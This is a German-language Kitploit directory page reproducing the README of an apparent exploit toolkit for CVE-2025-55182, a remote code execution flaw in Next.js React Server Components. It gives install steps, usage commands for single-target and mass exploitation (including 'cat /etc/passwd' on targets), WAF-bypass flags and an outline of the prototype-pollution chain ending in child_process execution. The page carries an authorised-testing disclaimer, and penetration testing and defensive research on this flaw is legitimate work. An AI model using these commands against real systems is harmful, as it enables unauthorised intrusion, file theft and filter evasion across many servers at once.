Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-NextJS-Scanner-React2Shell-PoC — Automatisiertes Erkennungs- und Ausnutzungs-Toolkit für CVE-2025-55182, eine kritische RCE in Next.js React Server Components. Bietet mehrschichtiges Fingerprinting, WAF-Bypass und Massenscanning für Penetrationstests. | Kitploit
Tools/GitHubGitHub/exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc
AufklärungSchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsCommand and Control

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHub
exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc

CVE-2025-55182-NextJS-Scanner-React2Shell-PoC

Automatisiertes Erkennungs- und Ausnutzungs-Toolkit für CVE-2025-55182, eine kritische RCE in Next.js React Server Components. Bietet mehrschichtiges Fingerprinting, WAF-Bypass und Massenscanning für Penetrationstests.

Repository anzeigen
3vor 9 MonatenNoch nicht geprüft
Teilen

CVE-2025-55182 Exploit-Tool

Ein umfassendes Sicherheitsforschungswerkzeug zum Testen der Remote-Code-Ausführungsschwachstelle (CVE-2025-55182) in Next.js React Server Components.

Übersicht

Dieses Toolkit bietet automatisierte Erkennungs- und Exploit-Funktionen für CVE-2025-55182, eine kritische RCE-Schwachstelle, die Next.js-Anwendungen mit React Server Components betrifft. Das Toolkit besteht aus drei integrierten Komponenten:

  • NextApp.py - Intelligenter Scanner zur Fingerabdruckerkennung von Next.js-Anwendungen
  • exploit.sh - Flexibles Exploit-Werkzeug für einzelne oder mehrere Ziele
  • auto_exploit.sh - End-to-End automatisierter Scan- und Exploit-Orchestrator

Funktionen

  • Mehrschichtige Erkennung: Header-Analyse, Body-Scanning und JavaScript-Fingerabdruck
  • Vertrauensbewertung: Intelligente Klassifizierung (Hoch/Mittel/Niedrig) zur Minimierung von Fehlalarmen
  • WAF-Bypass: Integrierte Techniken zur Umgehung gängiger Web Application Firewalls
  • Massen-Scanning: Effiziente Verarbeitung mehrerer Ziele mit detaillierter Berichterstattung
  • Automatisierter Workflow: Erkennung und Exploit mit einem Befehl
  • Detaillierte Berichterstattung: Umfassende Ausgabedateien mit kategorisierten Ergebnissen

Voraussetzungen

Python-Komponenten

  • Python 3.x
  • requests-Bibliothek
root@kitploit:~
pip3 install requests

Bash-Komponenten

  • curl
  • openssl
  • Standard Unix-Dienstprogramme (sed, grep, awk, mktemp)

Installation

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh

Verwendung

Schnellstart (Empfohlen)

Der schnellste Weg, Ziele zu scannen und auszunutzen:

root@kitploit:~
# Erstellen Sie eine Datei mit Ziel-URLs (eine pro Zeile)
echo "https://example.com" > targets.txt

# Automatischer Scan und Exploit in einem Befehl
./auto_exploit.sh -i targets.txt -s -c "id"

Nur Erkennung

Next.js-Anwendungen ohne Exploit identifizieren:

root@kitploit:~
python3 NextApp.py targets.txt

Ausgabedateien:

  • confirmed_nextjs_targets.txt - Alle erkannten Next.js-Anwendungen
  • high_confidence_nextjs_targets.txt - Nur Erkennungen mit hoher Vertrauenswürdigkeit

Einzelziel-Exploit

Einzelne Ziele testen:

root@kitploit:~
# Grundlegender Exploit
./exploit.sh -d https://target.com -c "whoami"

# Mit WAF-Bypass
./exploit.sh -d target.com -c "cat /etc/passwd" -w

# Benutzerdefinierte WAF-Bypass-Größe
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256

# SSL-Verifizierung überspringen
./exploit.sh -d https://target.com -c "id" -k

Massen-Exploit

Option 1: Einheitlicher Workflow (Empfohlen)

root@kitploit:~
./auto_exploit.sh -i targets.txt -s -c "whoami"

Option 2: Zweistufiger manueller Workflow

root@kitploit:~
# Schritt 1: Next.js-Anwendungen erkennen
python3 NextApp.py targets.txt

# Schritt 2: Bestätigte Ziele ausnutzen
./auto_exploit.sh -c "id"

Erweiterte Optionen

root@kitploit:~
# Vollständiger Auto-Scan mit WAF-Bypass
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"

# Benutzerdefinierte Verzögerungen und Timeouts
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"

# SSL-Verifizierung im Bulk-Modus überspringen
./auto_exploit.sh -i targets.txt -s -k -c "hostname"

Befehlsreferenz

NextApp.py

root@kitploit:~
python3 NextApp.py <targets_file>

Argumente:

  • targets_file - Textdatei mit Ziel-URLs (eine pro Zeile)

exploit.sh

root@kitploit:~
./exploit.sh [OPTIONEN]

Optionen:

auto_exploit.sh

root@kitploit:~
./auto_exploit.sh [OPTIONEN]

Optionen:

Ausgabedateien

confirmed_nextjs_targets.txt

Erzeugt von NextApp.py – enthält alle als Next.js-Anwendungen identifizierten URLs.

high_confidence_nextjs_targets.txt

Erzeugt von NextApp.py – enthält nur Next.js-Erkennungen mit hoher Vertrauenswürdigkeit (Vertrauenspunktzahl 100+).

exploit_results.txt

Erzeugt von auto_exploit.sh – umfassender Exploit-Bericht mit:

  • Angreifbaren Zielen mit Befehlsausgabe
  • Nicht angreifbaren Zielen
  • Fehlern und deren Details
  • Zusammenfassung der Statistiken

Erkennungsmethodik

Der Scanner verwendet mehrere Erkennungstechniken mit einem Vertrauensbewertungssystem:

Header-Analyse (jeweils 50 Punkte)

  • Next.js-spezifische Header: x-nextjs-*, x-vercel-*
  • x-powered-by: Next.js
  • Server: Vercel

Body-Scanning

  • Vorhandensein von __NEXT_DATA__ (100 Punkte)
  • Next.js buildId-Muster (50 Punkte)
  • _next/* Asset-Pfade (25-75 Punkte basierend auf Menge)

JavaScript-Fingerprinting (60 Punkte)

  • __NEXT_DATA__, __NEXT_LOADED_PAGES__
  • middlewareManifest, self.__RSC_MANIFEST

Vertrauensschwellen:

  • Hoch (100+): Mehrere starke Indikatoren
  • Mittel (75-99): Mehrere moderate Indikatoren
  • Niedrig (50-74): Minimale Nachweise
  • Unter 50: Als falsch positiv verworfen

Exploit-Mechanismus

Der Exploit nutzt eine Prototype-Pollution-Kette in Next.js React Server Components:

  1. Erstellt mehrteilige Formulardaten mit verschachteltem Payload
  2. Verschmutzt die __proto__-Kette über JSON-Deserialisierung
  3. Injiziert beliebiges JavaScript in _response._prefix
  4. Führt Befehle über process.mainModule.require('child_process').execSync() aus
  5. Extrahiert Ergebnisse aus dem X-Action-Redirect-Header
  6. URL-dekodiert und formatiert die Ausgabe

WAF-Bypass-Techniken

Das Toolkit enthält integrierte WAF-Bypass-Funktionen:

  • Junk-Daten-Injektion: Voranstellen von Zufallsdaten zur Umgehung von größenbasierten Filtern
  • Dynamische Grenzen: Zufällige mehrteilige Grenzen
  • Request-ID-Randomisierung: Einzigartige IDs pro Request
  • Konfigurierbare Größe: Einstellbare Junk-Daten-Größe (Standard 128 KB)

Aktivieren mit den Flags -w oder --waf-bypass.

Beispiele

Webanwendung scannen und ausnutzen

root@kitploit:~
# Zielliste erstellen
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF

# Einheitlichen Scan ausführen
./auto_exploit.sh -i targets.txt -s -c "whoami"

# Ergebnisse prüfen
cat exploit_results.txt

Einzelnes Ziel mit WAF-Bypass testen

root@kitploit:~
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256

Nur Ziele mit hoher Vertrauenswürdigkeit

root@kitploit:~
# Schritt 1: Erkennen und filtern
python3 NextApp.py targets.txt

# Schritt 2: Nur Ziele mit hoher Vertrauenswürdigkeit ausnutzen
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"

Rechtlicher Hinweis

Dieses Werkzeug ist nur für autorisierte Sicherheitstests und Forschungszwecke bestimmt. Benutzer müssen:

  • ✅ Vor dem Testen jeglicher Systeme eine ausdrückliche schriftliche Genehmigung einholen
  • ✅ Nur in autorisierten Penetrationstest-Einsätzen verwenden
  • ✅ Alle geltenden Gesetze und Vorschriften einhalten
  • ✅ Für defensive Sicherheitsforschung und CTF-Wettbewerbe verwenden

Unbefugter Zugriff auf Computersysteme ist illegal. Die Autoren übernehmen keine Haftung für Missbrauch dieses Werkzeugs.

Informationen zur Schwachstelle

  • CVE-ID: CVE-2025-55182
  • Betroffen: Next.js React Server Components
  • Typ: Remote Code Execution (RCE)
  • Schweregrad: Kritisch

Danksagungen

Dank an die Sicherheitsforscher, die diese Schwachstelle entdeckt und offengelegt haben:

  • @zack0x01
  • @infosec_au
  • @pdiscoveryio

Mitwirken

Beiträge sind willkommen! Bitte:

  1. Repository forken
  2. Einen Feature-Branch erstellen
  3. Ihre Änderungen committen
  4. Einen Pull-Request einreichen

Unterstützung

Bei Problemen, Fragen oder Funktionswünschen eröffnen Sie bitte ein Issue auf GitHub.

Lizenz

Dieses Projekt wird für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Nutzen Sie es verantwortungsvoll und ethisch.

Tool herunterladen
OptionBeschreibungStandard
-d, --domainZiel-Domain/URLhttp://localhost:3000
-f, --fileDatei mit Zielliste-
-c, --commandAuszuführender Befehlid
-w, --waf-bypassWAF-Bypass aktivierenDeaktiviert
--waf-size SIZEWAF-Bypass-Datengröße (KB)128
--timeout SECONDSRequest-Timeout15
-k, --insecureSSL-Verifizierung überspringenDeaktiviert
--user-agent AGENTBenutzerdefinierter User-AgentMozilla/5.0...
-h, --helpHilfemeldung anzeigen-
OptionBeschreibungStandard
-i, --input FILEEingabe-Zieldateiconfirmed_nextjs_targets.txt
-o, --output FILEAusgabe-Ergebnisdateiexploit_results.txt
-c, --command CMDAuszuführender Befehlid
-w, --waf-bypassWAF-Bypass aktivierenDeaktiviert
--waf-size SIZEWAF-Bypass-Größe (KB)128
--timeout SECONDSRequest-Timeout15
-k, --insecureSSL-Verifizierung überspringenDeaktiviert
--delay SECONDSVerzögerung zwischen Requests2
-s, --scanAutomatischer Scan zuerst für Next.jsDeaktiviert
-h, --helpHilfemeldung anzeigen-